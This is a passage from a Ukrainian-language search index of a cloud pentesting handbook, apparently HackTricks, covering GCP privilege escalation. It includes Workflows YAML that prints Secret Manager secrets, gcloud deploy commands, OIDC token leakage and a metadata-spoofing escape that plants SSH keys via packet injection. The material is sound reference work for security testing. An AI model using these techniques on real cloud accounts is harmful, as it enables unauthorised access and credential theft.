трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » Посилання","id":"1083","title":"Посилання"},"1084":{"body":"Reading time: 3 minutes tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » GCP - Workflows Privesc","id":"1084","title":"GCP - Workflows Privesc"},"1085":{"body":"Основна інформація: GCP - Workflows Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » Workflows","id":"1085","title":"Workflows"},"1086":{"body":"Наскільки мені відомо, неможливо отримати shell з доступом до кінцевої точки метаданих, що містить облікові дані SA, прикріплені до Workflow. Однак можливо зловживати дозволами SA, додаючи дії для виконання всередині Workflow. Можливо знайти документацію конекторів. Наприклад, це сторінка конектора Secretmanager . У бічній панелі можна знайти кілька інших конекторів. І тут ви можете знайти приклад конектора, який друкує секрет: yaml main:\nparams: [input]\nsteps:\n- access_string_secret:\ncall: googleapis.secretmanager.v1.projects.secrets.versions.accessString\nargs:\nsecret_id: secret_name\nversion: 1\nproject_id: project-id\nresult: str_secret\n- returnOutput:\nreturn: \"${str_secret}\" Оновлення з CLI: bash gcloud workflows deploy \\\n--service-account=email@SA \\\n--source=/path/to/config.yaml \\\n--location us-central1 Якщо ви отримали помилку, наприклад, ERROR: (gcloud.workflows.deploy) FAILED_PRECONDITION: Workflows service agent does not exist, просто почекайте хвилину і спробуйте знову . Якщо у вас немає доступу до вебу, ви можете запустити та побачити виконання Workflow за допомогою: bash # Run execution with output\ngcloud workflows run --location us-central1 # Run execution without output\ngcloud workflows execute --location us-central1 # List executions\ngcloud workflows executions list # Get execution info and output\ngcloud workflows executions describe projects//locations//workflows//executions/ caution Ви також можете перевірити вихідні дані попередніх виконань, щоб знайти чутливу інформацію Зверніть увагу, що навіть якщо ви отримаєте помилку, наприклад, PERMISSION_DENIED: Permission 'workflows.operations.get' denied on..., тому що у вас немає цього дозволу, робочий процес був згенерований.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » workflows.workflows.create, iam.serviceAccounts.ActAs, workflows.executions.create, (workflows.workflows.get, workflows.operations.get)","id":"1086","title":"workflows.workflows.create, iam.serviceAccounts.ActAs, workflows.executions.create, (workflows.workflows.get, workflows.operations.get)"},"1087":{"body":"Згідно з документацією , можливо використовувати кроки робочого процесу, які надсилають HTTP-запит з токеном OAuth або OIDC. Однак, як і в випадку з Cloud Scheduler , HTTP-запит з токеном Oauth повинен бути до хоста .googleapis.com. caution Отже, можливо витікати OIDC токен, вказуючи HTTP-інтерфейс , контрольований користувачем, але для витоку OAuth токена вам потрібен обхід для цього захисту. Однак ви все ще можете взаємодіяти з будь-яким GCP API для виконання дій від імені SA , використовуючи або конектори, або HTTP-запити з токеном OAuth. Oauth yaml - step_A:\ncall: http.post\nargs:\nurl: https://compute.googleapis.com/compute/v1/projects/myproject1234/zones/us-central1-b/instances/myvm001/stop\nauth:\ntype: OAuth2\nscopes: OAUTH_SCOPE OIDC yaml - step_A:\ncall: http.get\nargs:\nurl: https://us-central1-project.cloudfunctions.net/functionA\nquery:\nfirstNumber: 4\nsecondNumber: 6\noperation: sum\nauth:\ntype: OIDC\naudience: OIDC_AUDIENCE","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » Leak OIDC token (і OAuth?)","id":"1087","title":"Leak OIDC token (і OAuth?)"},"1088":{"body":"З цією дозволом замість workflows.workflows.create можливо оновити вже існуючий робочий процес і виконати ті ж атаки. tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » workflows.workflows.update ...","id":"1088","title":"workflows.workflows.update ..."},"1089":{"body":"Reading time: 2 minutes tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » GCP - Загальні дозволи Privesc","id":"1089","title":"GCP - Загальні дозволи Privesc"},"109":{"body":"Basic Gitea Information","breadcrumbs":"Gitea Security » Основна інформація","id":"109","title":"Основна інформація"},"1090":{"body":"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » Загальні цікаві дозволи","id":"1090","title":"Загальні цікаві дозволи"},"1091":{"body":"Якщо ви володієте користувачем, який має дозвіл setIamPolicy в ресурсі, ви можете підвищити привілеї в цьому ресурсі , оскільки зможете змінити IAM політику цього ресурсу і надати собі більше привілеїв над ним. Цей дозвіл також може дозволити підвищити привілеї до інших принципів , якщо ресурс дозволяє виконувати код, а iam.ServiceAccounts.actAs не є необхідним. cloudfunctions.functions.setIamPolicy Змінити політику Cloud Function, щоб дозволити собі її викликати. Існує десятки типів ресурсів з таким видом дозволу, ви можете знайти всі з них на https://cloud.google.com/iam/docs/permissions-reference , шукаючи setIamPolicy.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » *.setIamPolicy","id":"1091","title":"*.setIamPolicy"},"1092":{"body":"Ці дозволи можуть бути дуже корисними для спроби підвищити привілеї в ресурсах, створюючи новий або оновлюючи новий . Ці види дозволів особливо корисні, якщо ви також маєте дозвіл iam.serviceAccounts.actAs над обліковим записом служби, а ресурс, над яким ви маєте .create/.update, може прикріпити обліковий запис служби.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » *.create, *.update","id":"1092","title":"*.create, *.update"},"1093":{"body":"Цей дозвіл зазвичай дозволяє вам доступ або змінення облікового запису служби в деякому ресурсі (наприклад: compute.instances.setServiceAccount). Це може призвести до вектора підвищення привілеїв , але це залежатиме від кожного випадку. tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » *ServiceAccount*","id":"1093","title":"*ServiceAccount*"},"1094":{"body":"Reading time: 4 minutes tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Network Docker Escape » GCP - Network Docker Escape","id":"1094","title":"GCP - Network Docker Escape"},"1095":{"body":"У обох звітах, де зазначена ця техніка, зловмисники змогли отримати доступ до root всередині Docker контейнера, керованого GCP, з доступом до хост-мережі (та можливостями CAP_NET_ADMIN та CAP_NET_RAW ).","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Network Docker Escape » Initial State","id":"1095","title":"Initial State"},"1096":{"body":"На екземплярі Google Compute Engine регулярна перевірка мережевого трафіку виявляє численні plain HTTP запити до метаданих екземпляра за адресою 169.254.169.254. Google Guest Agent , відкритий сервіс, часто робить такі запити. Цей агент призначений для моніторингу змін у метаданих . Зокрема, метадані містять поле для публічних ключів SSH . Коли новий публічний SSH ключ додається до метаданих, агент автоматично авторизує його у файлі .authorized_key. Він також може створити нового користувача та додати його до sudoers , якщо це необхідно. Агент моніторить зміни, надсилаючи запит на отримання всіх значень метаданих рекурсивно (GET /computeMetadata/v1/?recursive=true). Цей запит призначений для того, щоб змусити сервер метаданих надіслати відповідь лише у разі зміни метаданих з моменту останнього отримання, що визначається Etag (wait_for_change=true&last_etag=). Крім того, включено параметр тайм-ауту (timeout_sec=). Якщо зміни не відбуваються протягом вказаного тайм-ауту, сервер відповідає незмінними значеннями . Цей процес дозволяє IMDS (Служба метаданих екземпляра) відповісти через 60 секунд , якщо зміни конфігурації не відбулися, створюючи потенційне вікно для впровадження фальшивої конфігураційної відповіді до гостьового агента. Зловмисник може скористатися цим, здійснивши атаку \"людина посередині\" (MitM) , підробляючи відповідь від сервера IMDS та вставляючи новий публічний ключ . Це може дозволити несанкціонований доступ SSH до хоста.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Network Docker Escape » Attack Explanation","id":"1096","title":"Attack Explanation"},"1097":{"body":"Хоча ARP підробка є неефективною в мережах Google Compute Engine, модифікована версія rshijack , розроблена Ezequiel , може бути використана для ін'єкції пакетів у комунікації для вставки SSH користувача. Ця версія rshijack дозволяє вводити номери ACK та SEQ як аргументи командного рядка, що полегшує підробку відповіді перед реальною відповіддю сервера метаданих. Крім того, використовується невеликий Shell скрипт , щоб повернути спеціально підготовлений корисний вантаж . Цей вантаж спонукає Google Guest Agent створити користувача wouter з вказаним публічним ключем у файлі .authorized_keys. Скрипт використовує той же ETag, щоб запобігти негайному сповіщенню сервера метаданих Google Guest Agent про різні значення метаданих, таким чином затримуючи відповідь. Для виконання підробки необхідні наступні кроки: Моніторинг запитів до сервера метаданих за допомогою tcpdump : bash tcpdump -S -i eth0 'host 169.254.169.254 and port 80' & Шукайте рядок, подібний до: